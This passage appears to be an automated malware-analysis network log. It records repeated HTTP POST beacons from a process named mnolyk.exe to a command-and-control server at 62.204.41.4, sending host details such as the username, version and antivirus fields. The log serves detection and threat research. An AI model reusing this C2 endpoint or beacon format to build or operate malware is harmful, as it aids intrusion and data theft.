                            562         192.168.2.4  50257        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:01.251488924 CET  750                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.316854000 CET  750                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            563         192.168.2.4  50258        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:01.487832069 CET  751                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.551681995 CET  751                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            564         192.168.2.4  50259        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:01.724391937 CET  752                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.787542105 CET  752                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            565         192.168.2.4  50260        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:01.971811056 CET  753                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.037451029 CET  753                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            566         192.168.2.4  50261        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:02.232460976 CET  754                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.296423912 CET  754                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            567         192.168.2.4  50262        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:02.469569921 CET  755                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.534327984 CET  755                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            568         192.168.2.4  50263        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:02.709618092 CET  756                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:02.775855064 CET  756                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            569         192.168.2.4  50264        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:02.955745935 CET  757                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.020263910 CET  757                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            57          192.168.2.4  49752        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:40.700037956 CET  246                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.766264915 CET  246                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            570         192.168.2.4  50265        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:03.200849056 CET  758                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.264765024 CET  758                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            571         192.168.2.4  50266        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:03.436703920 CET  759                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.501296043 CET  759                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            572         192.168.2.4  50267        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:03.678070068 CET  760                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.740642071 CET  760                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            573         192.168.2.4  50268        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:03.929436922 CET  761                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:03.995546103 CET  761                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            574         192.168.2.4  50269        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:04.215306997 CET  762                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:04.277790070 CET  762                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            575         192.168.2.4  50270        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:04.450423956 CET  763                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:04.513201952 CET  763                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            576         192.168.2.4  50271        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:04.731946945 CET  764                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:04.795159101 CET  764                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            577         192.168.2.4  50272        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:04.969177008 CET  765                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.031811953 CET  765                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            578         192.168.2.4  50273        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:05.210079908 CET  766                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.275161028 CET  766                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            579         192.168.2.4  50274        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:05.455950975 CET  767                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:05.521435976 CET | 767 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            58 | 192.168.2.4 | 49753 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:40.932450056 CET | 247 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.996359110 CET | 247 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            580 | 192.168.2.4 | 50275 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:05.702719927 CET | 768 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
